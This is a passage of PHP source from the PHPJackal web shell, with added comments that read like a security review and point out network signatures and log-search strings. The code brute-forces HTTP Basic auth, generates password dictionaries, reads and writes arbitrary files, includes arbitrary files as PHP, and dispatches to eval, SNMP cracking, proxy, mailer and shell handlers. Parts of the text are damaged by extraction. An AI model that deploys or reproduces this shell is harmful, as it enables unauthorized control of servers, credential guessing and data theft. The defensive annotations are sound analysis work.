    }}}else{$output=fopen($_REQUEST['output'],'w');if($output){while(!feof($input)){$user=trim(fgets($input)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}

    fclose($input);fclose($output);echo 'Done';}else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et
    ";}}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);if($combo && $res){$file=file($_REQUEST['output']);$output=fopen($_REQUEST['output'],'w');foreach($file as $v)fwrite($output,"$v:$v\n");fclose($output);

    }echo 'Done';}else{$temp=whereistmP().DIRECTORY_SEPARATOR;echo "${t}Wordlist generator:Range:a-zA-Z0-9Min lenght:12345678910Max lenght:23456789101112131415Output:Combo style output$hcwd$et
    ${t}Grab dictionary:Grab from:Output:


    lue='$temp.dic' name=output size=35>Combo style output$hcwd$et
    ${t}Download dictionary:URL:Output:Combo style output$hcwd$et";}}function ftpclienT(){global $t,$cwd,$hcwd,$errorbox,$et;$td="";if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pa

    sS']) && function_exists('ftp_connect')){$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];$con=ftp_connect($_REQUEST['hosT'],21,10);if($con){$ftp=ftp_login($con,$user,$pass);if($ftp){if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);if(!empty($_REQUEST['filE'])){$file=$_REQUEST['filE'];$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);elseif(isset($_REQUEST['rM'])){

    ftp_rmdir($con,$file);ftp_delete($con,$file);}elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);}$pwd=ftp_pwd($con);$dir=ftp_nlist($con,'');$d=opendir($cwd);echo "${td}Server:${td}Client:$td$td$td";foreach($dir as $n)echo "$n
    ";echo "$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir
    "; echo "${td}Name:Binary$td$et";}else echo "$errorbox Wrong username or password$et";}else echo "$errorbox Can not connect to server!$et";}

    else{echo "${t}FTP cilent:Server:


    '#666666'>Username:Password:$hcwd$et";

    }}function calC(){global $t,$et,$hcwd;$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){$to=$_REQUEST['to'];echo "${t}Output:
    ";if($to=='hex')for($i=0;$i


    /*
     * Tail of the HTTP Basic-auth guessing loop. Its function header is not
     * part of this excerpt; presumably this is authcrackeR(), which the
     * dispatcher calls for the action code 'auth'.
     * One TCP connection to port 80 is opened per candidate and the request is
     * assembled by hand. Fixed traits usable as a network signature:
     * HTTP/1.0, "Accept-Encoding: text", a Referer equal to the Host value and
     * "Connection: Close".
     * For POST the Content-Type/Content-Length text is single-quoted, so its
     * \r\n stays a literal backslash sequence, and it is appended directly
     * after the base64 value with no line break in between.
     * A candidate counts as a hit when characters 9-10 of the status line are
     * '20'. Hits are echoed unescaped and optionally appended to $file.
     */
    $pass=trim(fgets($dictionary)," \n\r");}$so=fsockopen($host,80,$en,$es,5);if(!$so){echo "$errorbox Can not connect to host$et";break;}else{$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$

    pass");if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);$packet.="\r\n\r\n";$packet.=$data;fputs($so,$packet);$res=substr(fgets($so),9,2);fclose($so);if($res=='20'){echo "U: $user P: $pass";if($log)file_add_contentS($file,"U:$user P: $pass\r\n");}}}

    echo 'Done!';}else echo "${t}HTTP Auth cracker:POSTGETDictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";}
    /*
     * openiT($name): displays a file. Names ending in php, php3, php4, phps,
     * phtml, phtm or inc go through highlight_file(); everything else is read
     * with file_get_contents() and printed through htmlspecialchars().
     * The dispatcher passes $_REQUEST['namE'] unchanged, so this reads any
     * file the PHP process can open.
     */
    function openiT($name){$ext=strtolower(substr($name,strrpos($name,'.')+1));$src=array('php','php3','php4','phps','phtml','phtm','inc');if(in_array($ext,$src))highlight_file($name);else echo ''.htmlspecialchars(file_get_contents($name)).'';}
    /*
     * opensesS($name): prints a Name/Type/Value table for the file's content,
     * apparently a serialized PHP session. The content is split on ';', each
     * entry is split again, and the letter before ':' (i, s, b, f, a, o, n) is
     * mapped to a type label. Names and values are echoed unescaped.
     * NOTE(review): explode('',$v) has an empty delimiter as printed; the
     * original character was probably lost in extraction, confirm against an
     * intact copy. The function's closing brace follows after the page break.
     */
    function opensesS($name){$sess=file_get_contents($name);$var=explode(';',$sess);echo "Name\tType\tValue\r\n";foreach($var as $v){$t=explode('',$v);$c=explode(':',$t[1]);$y='';if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';

    echo $t[0]."\t$y\t".$c[1]."\r\n";}echo '';


    }
    /*
     * logouT(): expires the cookie named 'passw' (empty value, expiry set
     * 10000 seconds in the past) and redirects to the URL returned by hlinK(),
     * which is defined outside this excerpt.
     * NOTE(review): the cookie name suggests the shell's access password is
     * carried in this cookie; confirm against the login code. If so, requests
     * carrying a 'passw' cookie are a useful filter when reviewing web logs
     * that record cookies.
     */
    function logouT(){setcookie('passw','',time()-10000);header('Location: '.hlinK());}?>

    body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}function HS(box){

    if(document.getElementById(box).style.display!="none"){document.getElementById(box).style.display="none";document.getElementById('lk').innerHTML="+";}else{document.getElementById(box).style.display="";document.getElementById('lk').innerHTML="-";}}function chmoD($file){$ch=prompt("Changing file mode["+$file+"]: ex. 777","");if($ch != null)location.href=""+$file+"&modE="+$ch;

    }PHPJackal [][Back] -


    /*
     * Action dispatcher: each case maps a short action code to one handler.
     * The switch expression is not part of this excerpt; links built elsewhere
     * in the listing use "seC=px", which matches case 'px', so the selector is
     * presumably the 'seC' request parameter (confirm against an intact copy).
     *
     * Cases that act on request data directly, without any check on the path:
     *  - 'edit': when 'Save' is set, opens $_REQUEST['file'] for writing and
     *    stores $_REQUEST['edited'] in it; the fopen() result is not checked.
     *    Note the two spellings in use, 'file' for the write and 'filE' for
     *    the editor view.
     *  - 'inc': include() of $_REQUEST['filE'], guarded only by file_exists(),
     *    so any existing file is parsed and run as PHP.
     *  - 'openit', 'img', 'checksum': pass 'namE' / 'filE' to their handlers
     *    unchanged.
     * The mixed-case parameter names (filE, namE, seC) and the short action
     * codes are distinctive strings for log searches and request filtering.
     * Unknown or missing actions print $intro; $footer is always appended.
     */
    case 'fm':filemanageR();break;case 'sc':scanneR();break;case 'phpinfo':phpinfo();break;case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);if(!empty($_REQUEST['Save'])){$filehandle=fopen($_REQUEST['file'],'w');fwrite($filehandle,$_REQUEST['edited']);

    fclose($filehandle);}if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');break;case 'openit':openiT($_REQUEST['namE']);break;case 'cr':crackeR();break;case 'dic':dicmakeR();break;case 'tools':toolS();break;case 'hex':hexvieW();break;case 'img':showimagE($_REQUEST['filE']);break;case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;case 'hc':hashcrackeR();break;case 'fcr':formcrackeR();break;

    case 'auth':authcrackeR();break;case 'ftpc':ftpclienT();break;case 'eval':phpevaL();break;case 'snmp':snmpcrackeR();break;case 'px':pr0xy();break;case 'webshell':webshelL();break;case 'mailer':maileR();break;case 'br':brshelL();break;case 'asm':safemodE();break;case 'sqlcl':sqlclienT();break;case 'calc':calC();break;case 'sysinfo':sysinfO();break;case 'checksum':checksuM($_REQUEST['filE']);break;

    case 'logout':logouT();break;default: echo $intro;}}else echo $intro;echo $footer;?>